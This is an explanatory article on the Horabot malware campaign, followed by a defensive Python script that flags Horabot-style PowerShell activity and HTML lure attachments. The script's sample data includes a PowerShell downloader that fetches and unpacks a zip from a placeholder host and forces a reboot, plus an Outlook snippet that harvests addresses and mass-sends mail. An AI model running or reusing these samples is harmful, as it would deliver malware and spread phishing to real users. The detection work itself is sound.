
Horabot Malware

Spanish-speaking users in Latin America have been targeted by a newly discovered botnet malware known as Horabot. The attack campaign is believed to have been active since at least November 2020. The threatening program grants threat actors the ability to manipulate the victim's Outlook mailbox, extract email addresses from their contacts, and send phishing emails containing malicious HTML attachments to all the addresses within the compromised mailbox.

In addition to these capabilities, the Horabot Malware deploys a Windows-based financial Trojan and a spam tool. These components are designed to harvest sensitive online banking credentials and compromise popular webmail services such as Gmail, Outlook and Yahoo! With access to these compromised accounts, the malware operators can unleash a torrent of spam emails to a wide range of recipients.

Cybercriminals Target Several Different Industries with the Horabot Malware

According to a cybersecurity firm, a significant number of infections related to the Horabot campaign have been detected in Mexico. At the same time, there have been fewer identified victims in countries such as Uruguay, Brazil, Venezuela, Argentina, Guatemala and Panama. The threat actor responsible for the campaign is believed to be based in Brazil.

The ongoing campaign targets users primarily involved in the accounting, construction and engineering, wholesale distribution, and investment sectors. However, it is suspected that other industries in the region may also be affected by this threat.

The Horabot Malware is Delivered via a Multi-Stage Attack Chain

The attack campaign begins with phishing emails that use tax-related themes to lure recipients into opening an HTML attachment. The attachment embeds a link that leads to a RAR archive.

Opening the archived file executes a PowerShell downloader script, which retrieves a ZIP file containing the primary payloads from a remote server. The machine is also rebooted during this stage.

The system restart serves as the launching point for the banking Trojan and the spam tool, enabling the threat actor to collect data, record keystrokes, capture screenshots, and distribute further phishing emails to the victim's contacts.

The banking Trojan used in the campaign is a 32-bit Windows DLL coded in the Delphi programming language. It exhibits similarities with other Brazilian malware families, such as Mekotio and Casbaneiro.

On the other hand, Horabot is a phishing botnet program designed for Outlook. It is written in PowerShell and possesses the capability to send phishing emails to all email addresses found in the victim's mailbox, thereby spreading the infection. This tactic is a deliberate strategy employed by the threat actor to reduce the risk of exposing their phishing infrastructure.
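The attack chain described above leaves two kinds of evidence a defender can triage: the HTML lure attachment (a link to an archive) and the PowerShell activity it triggers (an archive download followed by a reboot, then Outlook automation that reads mailbox addresses and sends mail). The following script is an added example written for this page, not code from the original article or from any vendor report on Horabot. It runs two generic heuristics over constructed sample data: a script-block classifier meant for text recorded by PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event 4104, assumed to be enabled), and a link extractor for HTML attachments. The indicator patterns, sample hostnames (`*.example.invalid`), and verdict labels are all assumptions chosen for illustration; they are not signatures taken from the campaign.

```python
"""Triage heuristics for the Horabot-style chain: archive download + reboot,
then Outlook mailbox harvesting and mass sending. All patterns and samples are
constructed for illustration; none are taken from the original article."""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit

# (indicator name, regex over script-block text, stage label) -- generic patterns
PS_INDICATORS = [
    ("archive_download",
     re.compile(r"(Invoke-WebRequest|Net\.WebClient|DownloadFile|Start-BitsTransfer)"
                r".*?\.(zip|rar)\b", re.I | re.S), "download"),
    ("forced_reboot",
     re.compile(r"\b(Restart-Computer|shutdown(\.exe)?\s+(/r|-r))\b", re.I), "reboot"),
    ("outlook_automation",
     re.compile(r"ComObject\s+Outlook\.Application", re.I), "outlook"),
    ("contact_harvest",
     re.compile(r"\.(Items|AddressEntries)\b.*?(SenderEmailAddress|Address)\b",
                re.I | re.S), "outlook"),
    ("mass_send",
     re.compile(r"\.CreateItem\(.*\.Send\(", re.I | re.S), "outlook"),
]


def classify_script_block(text: str) -> Dict[str, object]:
    """Return the indicators hit in one logged script block and a coarse verdict.

    'downloader-chain' needs both a download and a reboot indicator, matching the
    staged delivery described on the page; 'outlook-spam' needs Outlook COM use
    plus a CreateItem/Send pair. Single hits are only 'suspicious'."""
    hits = [name for name, rx, _ in PS_INDICATORS if rx.search(text)]
    stages = {stage for name, _, stage in PS_INDICATORS if name in hits}
    if {"download", "reboot"} <= stages:
        verdict = "downloader-chain"
    elif "outlook" in stages and "mass_send" in hits:
        verdict = "outlook-spam"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "verdict": verdict}


class _LinkCollector(HTMLParser):
    """Collect href values of <a> tags from an HTML attachment body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for key, value in attrs:
                if key == "href" and value:
                    self.links.append(value)


# Archive extensions worth flagging when an HTML lure links straight to them
ARCHIVE_EXT = re.compile(r"\.(rar|zip|7z)$", re.I)


def suspicious_attachment_links(html: str) -> List[str]:
    """Return links in an HTML attachment whose URL path ends in an archive."""
    collector = _LinkCollector()
    collector.feed(html)
    return [u for u in collector.links if ARCHIVE_EXT.search(urlsplit(u).path)]


# --- constructed sample telemetry (not real campaign artefacts) -------------
SAMPLE_DOWNLOADER = r'''
$c = New-Object Net.WebClient
$c.DownloadFile("http://files.example.invalid/p.zip", "$env:TEMP\p.zip")
Expand-Archive "$env:TEMP\p.zip" -DestinationPath "$env:APPDATA\x"
Restart-Computer -Force
'''

SAMPLE_SPAM_TOOL = r'''
$ol = New-Object -ComObject Outlook.Application
$inbox.Items | ForEach-Object { $_.SenderEmailAddress }
$m = $ol.CreateItem(0); $m.Send()
'''

SAMPLE_BENIGN = r'Get-ChildItem C:\logs | Where-Object Length -gt 1MB'

SAMPLE_ATTACHMENT = """<html><body><p>Su factura fiscal esta disponible.</p>
<a href="https://cdn.example.invalid/docs/factura_2023.rar">Descargar comprobante</a>
<a href="https://www.example.invalid/ayuda">Centro de ayuda</a></body></html>"""

if __name__ == "__main__":
    for label, block in [("downloader", SAMPLE_DOWNLOADER),
                         ("spam tool", SAMPLE_SPAM_TOOL),
                         ("benign", SAMPLE_BENIGN)]:
        print(label, classify_script_block(block))
    print("archive links:", suspicious_attachment_links(SAMPLE_ATTACHMENT))
```

The classifier deliberately requires the download and reboot indicators together before calling a block a downloader chain, because either alone is common in legitimate administration scripts; the attachment check flags only direct links to archives, which is the step the page identifies as the pivot from lure to payload. Both functions are pure and can be fed real 4104 message bodies or MIME attachment text from a mail gateway.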
